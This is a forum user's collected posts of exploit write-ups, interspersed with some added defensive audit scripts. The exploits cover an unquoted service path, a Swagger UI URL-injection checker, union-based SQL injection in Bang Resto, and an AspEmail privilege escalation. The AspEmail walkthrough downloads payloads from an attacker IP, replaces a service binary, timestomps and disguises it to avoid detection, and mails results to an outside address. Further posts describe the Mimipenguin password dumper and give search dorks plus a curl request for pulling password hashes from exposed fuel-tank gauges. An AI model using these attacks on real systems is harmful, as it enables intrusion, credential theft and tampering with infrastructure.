HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
     # Date: 2023-04-23
     # CVE: CVE-2023-2417
     # Exploit Author: MrEmpy
     # Vendor Homepage: https://www.ks-soft.net
     # Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
     # Version: > 12.56
     # Tested on: Windows 10 21H2

     Title:
     ================
     Advanced Host Monitor > 12.56 - Unquoted Service Path

     Summary:
     ================
     An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe". This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service.

     An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name, located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning.

     To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path so that the full path of the executable is enclosed in quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks.

     Proof of Concept:
     ================
     ```
     C:\>sc qc ActiveRMAService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: ActiveRMAService
             TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : KS Active Remote Monitoring Agent
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
     ```
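An audit helper for the unquoted-path condition above, written as an added example and not part of the advisory: it parses the `sc qc` output quoted in the post, lists the alternative file names CreateProcess would try before reaching the real executable, the directories whose write ACLs therefore decide exploitability, and the `sc config` command that installs the quoted path. Function names (`audit_service` and friends) are my own.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the `sc qc ActiveRMAService` output quoted in the advisory above.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def sc_qc_field(sc_qc_text: str, field: str) -> Optional[str]:
    """Read one 'FIELD : value' line from `sc qc` output (the value may be empty)."""
    pattern = r"^[ \t]*" + re.escape(field) + r"[ \t]*:[ \t]*(.*?)[ \t]*$"
    m = re.search(pattern, sc_qc_text, re.MULTILINE)
    return m.group(1) if m else None


def split_image_and_args(binpath: str) -> Tuple[str, str, bool]:
    """Return (image_path, arguments, was_quoted) for a BINARY_PATH_NAME value.

    A quoted value is unambiguous. For an unquoted one we take everything up to
    the first '.exe' as the image the service author intended; CreateProcess
    does not know that and has to guess where the file name ends.
    """
    if binpath.startswith('"'):
        end = binpath.find('"', 1)
        return binpath[1:end], binpath[end + 1:].strip(), True
    m = re.match(r"(.*?\.exe)\b(.*)", binpath, re.IGNORECASE)
    if m:
        return m.group(1), m.group(2).strip(), False
    return binpath, "", False


def createprocess_candidates(image_path: str) -> List[str]:
    """File names CreateProcess tries, in order, for an unquoted path with spaces.

    Documented rule: every space may end the file name, and '.exe' is appended
    when the candidate has no extension. The last candidate is the real file.
    """
    candidates = []
    for i, ch in enumerate(image_path):
        if ch == " ":
            prefix = image_path[:i]
            if not ntpath.splitext(prefix)[1]:
                prefix += ".exe"
            candidates.append(prefix)
    candidates.append(image_path)
    return candidates


def audit_service(sc_qc_text: str) -> Dict:
    """Flag an unquoted service path and describe what to check and how to fix it."""
    name = sc_qc_field(sc_qc_text, "SERVICE_NAME")
    binpath = sc_qc_field(sc_qc_text, "BINARY_PATH_NAME") or ""
    image, args, quoted = split_image_and_args(binpath)
    vulnerable = (not quoted) and (" " in image)
    candidates = createprocess_candidates(image) if vulnerable else [image]
    fixed = f'"{image}"' + (f" {args}" if args else "")
    # Inner quotes must be escaped for cmd.exe: binPath= "\"C:\...\x.exe\" /service"
    sc_fix = f'sc config {name} binPath= "\\"{image}\\"' + (f" {args}" if args else "") + '"'
    return {
        "service": name,
        "binpath": binpath,
        "unquoted_with_spaces": vulnerable,
        # Names that would be tried before the real executable.
        "ambiguous_candidates": candidates[:-1],
        # Directories whose write ACLs decide whether a rogue candidate can be created;
        # on a default install C:\ is not writable by standard users, which limits the impact.
        "directories_to_check": sorted({ntpath.dirname(c) for c in candidates[:-1]}),
        "fixed_binpath": fixed,
        "sc_config_command": sc_fix,
    }
```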
  2. ```python
     # Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
     # Date: 14 April, 2023
     # Exploit Author: Rafael Cintra Lopes
     # Vendor Homepage: https://swagger.io/
     # Version: < 4.1.3
     # CVE: CVE-2018-25031
     # Site: https://rafaelcintralopes.com.br/
     # Usage: python swagger-exploit.py https://[swagger-page].com

     from selenium import webdriver
     from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
     from selenium.webdriver.chrome.service import Service
     import time
     import json
     import sys

     if __name__ == "__main__":
         target = sys.argv[1]

         # Capture the browser's network log so we can see which spec URLs the UI fetched.
         desired_capabilities = DesiredCapabilities.CHROME
         desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

         options = webdriver.ChromeOptions()
         options.add_argument("--headless")
         options.add_argument("--ignore-certificate-errors")
         options.add_argument("--log-level=3")
         options.add_experimental_option("excludeSwitches", ["enable-logging"])

         # Browser webdriver path
         drive_service = Service("C:/chromedriver.exe")
         driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities)

         # Load the page with both query parameters the UI may honour.
         driver.get(target + "?configUrl=https://petstore.swagger.io/v2/hacked1.json")
         time.sleep(10)
         driver.get(target + "?url=https://petstore.swagger.io/v2/hacked2.json")
         time.sleep(10)

         logs = driver.get_log("performance")
         with open("log_file.json", "w", encoding="utf-8") as f:
             f.write("[")
             for log in logs:
                 log_file = json.loads(log["message"])["message"]
                 if ("Network.response" in log_file["method"]
                         or "Network.request" in log_file["method"]
                         or "Network.webSocket" in log_file["method"]):
                     f.write(json.dumps(log_file) + ",")
             f.write("{}]")
         driver.quit()

         json_file_path = "log_file.json"
         with open(json_file_path, "r", encoding="utf-8") as f:
             logs = json.loads(f.read())

         # If the browser requested our marker URLs, the UI accepted the parameter.
         for log in logs:
             try:
                 url = log["params"]["request"]["url"]
                 if url == "https://petstore.swagger.io/v2/hacked1.json":
                     print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
                 if url == "https://petstore.swagger.io/v2/hacked2.json":
                     print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
             except Exception:
                 pass
     ```
  3. # Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
     # Date: 2023-04-02
     # Exploit Author: Rahad Chowdhury
     # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
     # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
     # Version: 1.0
     # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
     # CVE: CVE-2023-29849

     *Affected Parameters:*
     btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], itemqty[], btnMenuItemID

     *Steps to Reproduce:*

     1. First, log in to your staff panel.
     2. Then go to the "order" menu, select a menu item, create an order and intercept the request data using Burp Suite. Your request data will be:

     ```
     POST /bangresto/staff/displayitem.php HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 194
     Origin: http://127.0.0.1
     Referer: http://127.0.0.1/bangresto/staff/order.php
     Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
     Connection: close

     btnMenuItemID=1&qty=1
     ```

     3. The "btnMenuItemID" parameter is vulnerable. Let's try union-based SQL injection by using this query in the "btnMenuItemID" parameter:

     ```
     .1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- -
     ```

     4. Check the browser; you will see the user, database and version information.
     5. You could also use sqlmap to dump the whole database by saving the web request from Burp Suite.
  4. ####################################################################################################################
     # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation
     # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]
     # Date: 13/04/2023
     # Exploit Author: Zer0FauLT [admindeepsec@proton.me]
     # Vendor Homepage: https://www.aspemail.com
     # Software Link: https://www.aspemail.com/download.html
     # Product: AspEmail
     # Version: AspEmail 5.6.0.2 and all
     # Platform - Architecture: Windows - 32-bit | 64-bit | Any CPU
     # Tested on: Windows Server 2016 and Windows Server 2019
     # CVE: 0DAY
     ####################################################################################################################

     ```
     [+] C:\PenTest>whoami /priv

     PRIVILEGES INFORMATION
     ----------------------

     Privilege Name                Description                               State
     ============================= ========================================= ========
     SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
     SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
     SeImpersonatePrivilege        Impersonate a client after authentication Enabled
     SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
     ```

     * First, we will test whether the AspEmail service is active.
     * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:

     ```
     [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
     EmailAgent.exe                4400 Persits Software EmailAgent
     ```
     or
     ```
     [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
     EmailAgent64.exe              4400 Persits Software EmailAgent
     ```

     * We have detected that the process of the "Persits Software Email Agent" service is in state "RUNNING".
     * Now we know that the AspEmail service is active.

     * We will need these:

     ```
     [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe"   <<<=== MyExploit
     [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
     [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
     [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
     [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
     ```

     ```
     [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

     Name              : Persits Software EmailAgent
     ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run
     User              : LocalSystem
     ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
     IdentityReference : Everyone
     Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse
     Status            : Unknown
     UserCanStart      : False
     UserCanStop       : False

     [+] C:\PenTest>del PrivescCheck.ps1
     ```

     * We detected the "Persits Software EmailAgent" service "Binary Permission Vulnerability" in our checks.

     ```
     [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
     Successfully processed 0 files; Failed processing 1 files
     C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
     ```

     * We do not have permission to access subdirectories.

     ```
     [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
     C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                          DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                          DeepSecLab\psaadm:(I)(OI)(CI)(N)
                                                          DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                                                          BUILTIN\Administrators:(I)(F)
                                                          CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                          NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                          BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                          BUILTIN\Users:(I)(OI)(CI)(RX)
                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
     ```

     * Unlike other directories, we have full privileges in the "BIN" directory of the service.
     * This is chmod 0777 - rwxrwxrwx in Linux language.

     ```
     [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
     __PATH  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
     \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID  Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16

     [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
     ```

     * We understood that the "EmailAgent.exe" process was installed by the Administrator and that the owner is the Administrator user.

     * Now we will take ownership of this directory, as we will execute our operations under the "BIN" directory.

     ```
     [+] C:\PenTest>whoami
     DeepSecLab\Hacker

     [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
     SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".

     [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
     processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
     Successfully processed 1 files; Failed processing 0 files
     ```

     * OK. All commands completed successfully. We now have full privileges for this directory.

     * Now we will modify the EmailAgent file and inject a self-written malware.
     * We will be careful not to damage any files while doing this so that all transactions can be easily undone.

     ```
     [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
     [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
     ```

     ```
     [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
      Volume in drive C has no label.
      Volume Serial Number is 0C8A-5291

      Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

     14.04.2023  16:47    <DIR>          .
     14.04.2023  16:47    <DIR>          ..
     01.03.2004  15:55           143.360 AspEmail.dll
     25.02.2004  16:23           188.416 AspUpload.dll
     13.04.2023  22:00            12.288 EmailAgent.exe   <<<=== ReNamed for EmailAgentPrivESC.exe
     24.09.2003  09:22           139.264 EmailAgentCfg.cpl
     24.09.2003  09:25            94.208 EmailLogger.dll
     24.09.2003  09:21           167.936 Null.EmailAgent.exe
                    6 File(s)        745.472 bytes
                    2 Dir(s)  165.936.717.824 bytes free
     ```

     * We now set the Last Modified Date, Creation Date and Last Accessed Date.

     ```
     [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
     [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
     ```

     * Next, we extract the icon of the real EmailAgent.exe file and change the exploit's icon to it. This way, we will make it harder to detect.
     * I used the Resource Tuner Console tool.
       >>> http://www.restuner.com/tour-resource-tuner-console.htm
     * This can be done easily with the Resource Tuner tool.
       >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
       >>> http://www.restuner.com/download.htm

     ```
     [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
      Volume in drive C has no label.
      Volume Serial Number is 0C8A-5291

      Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

     14.04.2023  16:47    <DIR>          .
     14.04.2023  16:47    <DIR>          ..
     01.03.2004  15:55           143.360 AspEmail.dll
     25.02.2004  16:23           188.416 AspUpload.dll
     24.09.2003  09:21            12.288 EmailAgent.exe
     24.09.2003  09:22           139.264 EmailAgentCfg.cpl
     24.09.2003  09:25            94.208 EmailLogger.dll
     24.09.2003  09:21           167.936 Null.EmailAgent.exe
                    6 File(s)        745.472 bytes
                    2 Dir(s)  165.936.717.824 bytes free

     [24.09.2003 09:21]   12.288  EmailAgent.exe
     [24.09.2003 09:21]  167.936  Null.EmailAgent.exe
     ```

     * And the time manipulation is over. They look like they were uploaded at the same time, long ago.

     * Now we check the ownership of my malware.

     ```
     [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
     __PATH  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
     \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID  Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28

     [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
     Name
     DeepSecLab\Hacker

     EmailAgent.exe Owner: DeepSecLab\Hacker
     ```

     ####################################################################################################################
     #[EmailAgent.cs]#
     ####################################################################################################################

     * We program this malware in such a way that when the server is rebooted (when the services are restarted),
     * it will be triggered and execute the code we want,
     * and then send a printout of all this to the email address we specified.

     ```csharp
     using System;
     using System.Linq;
     using System.Text;
     using System.Diagnostics;
     using System.IO;
     using System.Collections;

     namespace CliToolSpace
     {
         class _Main
         {
             static void Main(string[] args)
             {
                 Cli commandLine = new Cli();
                 commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
                 commandLine.Execute();
                 commandLine.ToFile(@"C:\Windows\Temp\");
             }
         }
     }
     ```

     ####################################################################################################################
     #[Mail.cs]#
     ####################################################################################################################

     ```csharp
     using System;
     using System.Net.Mail;
     using System.Net;

     SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
     var mail = new MailMessage();
     mail.From = new MailAddress("mail@deepseclab.com");
     mail.To.Add("mail@hacker.com");
     mail.Subject = "Trigger Successful!";
     mail.IsBodyHtml = true;
     string htmlBody;
     htmlBody = "<strong>This server has been rebooted.</strong>";
     mail.Body = htmlBody;
     Attachment attachment;
     attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
     mail.Attachments.Add(attachment);
     SmtpServer.Port = 587;
     SmtpServer.UseDefaultCredentials = false;
     SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com", "p@ssw0rd123");
     SmtpServer.EnableSsl = true;
     SmtpServer.Timeout = int.MaxValue;
     SmtpServer.Send(mail);
     ```

     ####################################################################################################################
     #[Run.bat]#
     ####################################################################################################################

     ```bat
     whoami > C:\Windows\Temp\Export.txt
     cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
     del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
     cd c:\Windows\Tasks
     del Run.bat & del Mail.exe
     ```

     ####################################################################################################################

     [+]Trigger Successful![+]

     ```
     [+] C:\PenTest>systeminfo | findstr "Boot Time"
     System Boot Time: 13.04.2022, 07:46:06
     ```

     ####################################################################################################################
     #[Export.txt]#
     ####################################################################################################################

     ```
     NT AUTHORITY\SYSTEM
     ```

     ####################################################################################################################

     ==================================================================================================================
     ...|||[FIX]|||...
     ==================================================================================================================

     ```
     [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD
     ```

     ```
     [+] C:\Administrator>sc qc "Persits Software EmailAgent"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: Persits Software EmailAgent
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Persits Software EmailAgent
             DEPENDENCIES       : rpcss
             SERVICE_START_NAME : LocalSystem
     ```

     ```
     [+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

     D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
     ```

     ```
     [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

     Accesschk v6.15 - Reports effective permissions for securable objects
     Copyright (C) 2006-2022 Mark Russinovich
     Sysinternals - www.sysinternals.com

     Persits Software EmailAgent
       Medium Mandatory Level (Default) [No-Write-Up]
       RW NT AUTHORITY\SYSTEM
             SERVICE_ALL_ACCESS
       RW BUILTIN\Administrators
             SERVICE_ALL_ACCESS
     ```

     ```
     [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

     [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
     Successfully processed 0 files; Failed processing 1 files
     C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
     ```

     DONE!

     ```
     [+] C:\Administrator>sc stop "Persits Software EmailAgent"
     [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
     ```

     * These commands are optional. They are used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
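A defender-side check for the two conditions this post inspects, written as an added example (not the author's tooling): it parses `icacls` output for a service's binary directory and flags ACEs that let any local user write there, and parses the `sc sdshow` SDDL for allow-ACEs that give a non-admin trustee control over the service object. The sample inputs are constructed from the command output shown above; the function names are my own, and the reset command mirrors the one the post uses in its fix.

```python
import re
from typing import Dict, List

# Constructed sample inputs, based on the icacls and sc sdshow output shown in the post above.
BIN_DIR = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
ICACLS_OUTPUT = r"""
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""
SERVICE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Principals every local user belongs to: write access for them means any user can swap the binary.
BROAD_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users",
                    r"nt authority\interactive"}
# icacls simple rights / specific rights that allow creating, replacing or deleting files.
WRITE_SIMPLE = {"F", "M", "W"}
WRITE_SPECIFIC = {"WD", "AD", "DC", "DE", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}


def parse_icacls(output: str, path: str) -> List[Dict]:
    """Turn `icacls <path>` output into one dict per ACE; summary lines are skipped."""
    aces = []
    for raw in output.strip().splitlines():
        line = raw.strip()
        if line.startswith(path):                 # the first line carries the path itself
            line = line[len(path):].strip()
        sep = line.rfind(":(")
        if sep < 0:
            continue
        trustee = line[:sep]
        flags = re.findall(r"\(([^)]*)\)", line[sep + 1:])
        rights = [f for f in flags if f not in INHERIT_FLAGS]
        aces.append({"trustee": trustee, "inherited": "I" in flags,
                     "inherit_only": "IO" in flags, "rights": rights})
    return aces


def grants_write(rights: List[str]) -> bool:
    """True if any simple right or comma-separated specific right allows writing."""
    for r in rights:
        tokens = {t.strip() for t in r.split(",")}
        if tokens & WRITE_SIMPLE or tokens & WRITE_SPECIFIC:
            return True
    return False


def weak_dir_aces(output: str, path: str) -> List[Dict]:
    """ACEs that let every local user write into the service's binary directory."""
    return [a for a in parse_icacls(output, path)
            if a["trustee"].lower() in BROAD_PRINCIPALS
            and not a["inherit_only"] and grants_write(a["rights"])]


# Service-object rights (SDDL two-letter codes) that let a trustee reconfigure or replace the service.
SERVICE_CONTROL_RIGHTS = {"DC": "SERVICE_CHANGE_CONFIG", "SD": "DELETE",
                          "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
ADMIN_TRUSTEES = {"SY", "BA"}          # LocalSystem and BUILTIN\Administrators


def weak_service_aces(sddl: str) -> List[Dict]:
    """Allow-ACEs in the DACL that give a non-admin trustee control over the service object."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        ace_type, _flags, rights, _obj, _inh, trustee = ace.split(";")[:6]
        if ace_type != "A" or trustee in ADMIN_TRUSTEES:
            continue
        risky = [SERVICE_CONTROL_RIGHTS[r] for r in re.findall(r"..", rights)
                 if r in SERVICE_CONTROL_RIGHTS]
        if risky:
            findings.append({"trustee": trustee, "rights": risky})
    return findings


def reset_command(path: str) -> str:
    """The remediation the post applies: re-inherit the ACL from the parent directory."""
    return f'icacls "{path}" /T /Q /C /RESET'
```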
  5. Mimipenguin beta-2.0

     A tool to dump the login password from the current Linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

     Details

     This version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from Linux desktop environments.

     Project address: link
  6. # Exploit Title: Franklin Fueling Systems TS-550 - Default Password
     # Date: 4/16/2023
     # Exploit Author: parsa rezaie khiabanloo
     # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
     # Version: TS-550
     # Tested on: Linux/Android (termux)

     Step 1: The attacker can use these dorks to find and access the panel:

     ```
     inurl:"relay_status.html"
     inurl:"fms_compliance.html"
     inurl:"fms_alarms.html"
     inurl:"system_status.html"
     inurl:"system_reports.html"
     inurl:"tank_status.html"
     inurl:"sensor_status.html"
     inurl:"tank_control.html"
     inurl:"fms_reports.html"
     inurl:"correction_table.html"
     ```

     Step 2: The attacker can send a request:

     ```
     curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
     ```

     Step 3: If you get a response that looks like this:

     ```xml
     <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
     <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
     <ROLE_LIST>
     <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
     <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
     <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
     </ROLE_LIST>
     ```

     Step 4: The attacker can crack the hashes using John the Ripper.

     Notice: most of the panels' password is: admin

